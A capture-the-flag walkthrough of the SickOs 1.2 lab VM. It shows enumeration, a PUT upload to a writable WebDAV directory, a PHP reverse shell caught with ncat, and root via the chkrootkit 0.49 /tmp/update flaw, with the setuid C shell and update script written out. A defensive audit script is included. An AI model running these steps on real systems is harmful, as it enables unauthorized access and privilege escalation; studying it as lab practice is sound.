SickOs 1.2 Walkthrough

Datetime: 2017-02-03 06:57:31    Topic: Lighttpd

You can find SickOs 1.2 on VulnHub.

Quick run-down:

  1. Service enumeration
  2. Check for any vulnerabilities
  3. Escalate to Root
  4. Get our flag

Exploit used:

  1. Chkrootkit 0.49

After seeing what is on my net, I began to do an Nmap scan on my target to see what kind of services are running. I see port 80 open so I head to the webpage to see what it has in store for me.

root@ch3rn0byl:~# nmap -A -p-
Starting Nmap 7.12 ( ) at 2016-04-29 01:54 EDT
Host is up (0.00046s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:16:EB:35 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1   0.47 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 113.70 seconds

I was greeted with a meme. As a side note, this is what my resting face looks like.

Inspecting the page source didn’t really reveal anything too obvious to me, so I had downloaded the image to see if anything was maybe inside the image. No fruit.

As I was poking around, I decided to run a dirb scan on the page to see if anything fruitful would come out of it. A few seconds later, I had learned there is a “/test/” directory. Su-WEET! I also ran a Nikto scan to see if anything would come out of that. Nikto had brought nothing to me, but that is definitely a-okay.

root@ch3rn0byl:~# dirb /usr/share/wordlists/dirb/common.txt
START_TIME: Fri Apr 29 05:20:45 2016
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
GENERATED WORDS: 4612
---- Scanning URL: ----
+ (CODE:200|SIZE:163)
==> DIRECTORY:
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
END_TIME: Fri Apr 29 05:20:47 2016

Let’s take a look at what is in /test/

Here is where it took me a little while. I was searching Exploit-DB for lighttpd and Google for lighttpd 1.4.28 exploits. There were some older vulnerabilities, but not any for the version I was looking at. Banged my head a few times to see if maybe I had missed something so simple? BUT I WAS FINDING NOTHING.

I looked in the page source and that had nothing as well. How fun. I decided to see what happens if maybe I can do a GET request using Netcat. The beauty of using that was after entering the request, it would hang. Grrrrrr…

Next thing I did was fire up Burpsuite and see if at least THAT would capture something. Indeed it did, however it was nothing too crazy or out of the norm. Also, I wanted to try more requests and not just watch them. What else can do requests?? I turned to cURL and read the help.

Finally!! I grabbed something interesting using cURL. The awesome thing was I was able to specify what type of request I wanted to make.

root@ch3rn0byl:~# curl -X OPTIONS -v
*  Trying
* Connected to ( port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host:
> User-Agent: curl/7.47.0
> Accept: */*
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Content-Length: 0
< Date: Fri, 29 Apr 2016 09:41:19 GMT
< Server: lighttpd/1.4.28
* Connection #0 to host left intact

I immediately noticed “PUT”. So I uploaded a test file to see if it would work. It didn’t upload at first, so I tried uploading it using “HTTP/1.0”. That worked with great success.

root@ch3rn0byl:~# curl --upload-file test.txt -v --url -0 --http1.0
*  Trying
* Connected to ( port 80 (#0)
> PUT /test/test.txt HTTP/1.0
> Host:
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Fri, 29 Apr 2016 09:45:42 GMT
< Server: lighttpd/1.4.28
* Closing connection 0

What next you may ask?? Well…let me tell you! I turned to my handy-dandy php-reverse-shell. Using the default port number wouldn’t work so I changed it to port 443. I set up my listener, went to my shell, and voila! I caught shell!

root@ch3rn0byl:~# ncat -nlvp 443
Ncat: Version 7.12 ( )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
 02:55:29 up  4:36,  0 users,  load average: 0.03, 0.07, 0.05
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty ; pty.spawn("/bin/bash")'

So after doing enumeration on the machine, we can see that there is a “chkrootkit” inside cron.daily. The interesting thing about this is that it’s version 0.49. According to Exploit-DB, if you place a file called “update” in /tmp, chkrootkit will run it with root privileges. Very nice.

Sooo…let’s escalate our privs!

First thing I did was create a little, stupid simple program that sets its gid and uid to 0 (root) and then spawns a shell. After this, I take advantage of update to set root ownership and the setuid bit on this simple, yet deadly binary, which is what allows me to run it as root >:D

If all goes well, I will now have a simple tool of mass destruction waiting for me in /tmp.

www-data@ubuntu:/tmp$ cat << EOF > root.c
> #include <unistd.h>
> #include <stdlib.h>
>
> /* Become uid/gid 0 and hand over to a shell. Only effective once the
>    binary is root-owned and setuid, which the "update" script below arranges. */
> int main(void)
> {
>     setgid(0);
>     setuid(0);
>     execl("/bin/sh", "sh", (char *)NULL);
>     return 1;
> }
> EOF
www-data@ubuntu:/tmp$ gcc root.c -o rootme
www-data@ubuntu:/tmp$ cat << EOF > update
> #!/bin/bash
> # chkrootkit 0.49 runs /tmp/update as root from the daily cron job,
> # so these commands execute with root privileges.
> chown root /tmp/rootme
> chgrp root /tmp/rootme
> chmod u+s /tmp/rootme
> EOF
www-data@ubuntu:/tmp$ chmod +x update

Now, after waiting a minute or so…it’s time to check!

www-data@ubuntu:/tmp$ ls -al
total 36
-rwsrwxrwx  1 root    root    7235 Apr 29 05:16 rootme

Great success!!
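The two conditions this box chains together, a WebDAV share that accepts writes and a scheduled chkrootkit run while /tmp/update exists, are both cheap to audit for from the defender's side. The script below is added here and is not part of the original walkthrough; the lighttpd directive names (webdav.activate, webdav.is-readonly) are the real mod_webdav ones, while the config snippets, the cron.daily directory and the tmp directory it inspects are constructed samples.

```shell
#!/bin/bash
# Added defender-side audit (not from the original walkthrough). It checks the
# two conditions this VM chains together: a lighttpd WebDAV share that accepts
# writes, and a scheduled chkrootkit run while a /tmp/update file exists.
# Paths are parameters so the checks run against the constructed samples below.

# 0 = finding: mod_webdav is activated and webdav.is-readonly is not set.
# Assumes a flat config; a read-only directive in another conditional block
# would need a real lighttpd config parser to evaluate.
webdav_writable() {
    conf="$1"
    grep -Eq '^[[:space:]]*webdav\.activate[[:space:]]*=[[:space:]]*"enable"' "$conf" || return 1
    grep -Eq '^[[:space:]]*webdav\.is-readonly[[:space:]]*=[[:space:]]*"enable"' "$conf" && return 1
    return 0
}

# 0 = finding: a chkrootkit job is in cron.daily and an update file exists in
# the tmp directory it would consult. Any owner counts, since the vulnerable
# version executes the file regardless of who created it.
chkrootkit_update_risk() {
    crondir="$1"; tmpdir="$2"
    [ -x "$crondir/chkrootkit" ] || return 1
    [ -e "$tmpdir/update" ]
}

# Constructed sample inputs (not taken from the VM) so the script runs offline.
WORK=$(mktemp -d)
cat > "$WORK/weak.conf" <<'EOF'
server.modules += ( "mod_webdav" )
$HTTP["url"] =~ "^/test($|/)" {
    webdav.activate = "enable"
}
EOF
cat > "$WORK/fixed.conf" <<'EOF'
server.modules += ( "mod_webdav" )
$HTTP["url"] =~ "^/test($|/)" {
    webdav.activate    = "enable"
    webdav.is-readonly = "enable"
}
EOF
mkdir -p "$WORK/cron.daily" "$WORK/tmp"
printf '#!/bin/sh\n/usr/sbin/chkrootkit\n' > "$WORK/cron.daily/chkrootkit"
chmod +x "$WORK/cron.daily/chkrootkit"
: > "$WORK/tmp/update"

webdav_writable "$WORK/weak.conf"  && echo "weak.conf: WebDAV accepts PUT/DELETE"
webdav_writable "$WORK/fixed.conf" || echo "fixed.conf: WebDAV is read-only"
chkrootkit_update_risk "$WORK/cron.daily" "$WORK/tmp" && echo "update file present alongside chkrootkit cron job"
```

On a real host, point the two functions at /etc/lighttpd/lighttpd.conf, /etc/cron.daily and /tmp; the read-only directive is the fix for the first finding, and removing the cron job or upgrading chkrootkit closes the second.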

All there is to do now is navigate to root folder and retrieve our flag!!

root@ubuntu:/root# cat *.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of OldSchool and testing it manually.
Thanks for giving this try.
@vulnhub: Thanks for hosting this UP!.

This was an awesome, frustrating, and amazing VM brought to you by D4rk! Thanks man!! That was a great one and I hope to see more coming!